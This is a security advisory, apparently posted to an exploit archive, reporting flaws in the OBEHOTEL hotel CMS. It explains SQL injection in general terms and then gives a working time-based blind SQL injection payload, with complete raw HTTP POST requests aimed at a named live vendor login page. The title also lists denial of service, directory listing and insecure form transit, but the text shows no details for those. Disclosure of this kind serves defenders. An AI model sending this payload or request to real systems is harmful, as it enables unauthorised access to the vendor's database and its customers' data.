Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.
OBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post
I-VULNERABILITY
-------------------------
#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post
#Vendor:https://secureadv.obehotel.com/mpa/
#Author:Juan Carlos Garcรญa (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
================
Obehotel is the set of different solutions, technological developments and applications directed
to hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience.
Obehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector
Efimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner.
This union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry.
-------------------------
III-PROOF OF CONCEPT
====================
Attack details
--------------
Blind SqlInjection
******************
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.
It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases,
it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions).
If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Attack details
--------------
URL encoded POST input username was set to
xlgskuot' or (sleep(2)+1) limit 1 --
POST /mpa/index.php
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ./hotel_inicio/index.php
Vary: Accept-Encoding
Content-Length: 3402
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20
variant (1)
name
POST /mpa/index.php HTTP/1.1
Content-Length: 92
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3
Host: secureadv.obehotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20
# 0day.today [2018-02-06] #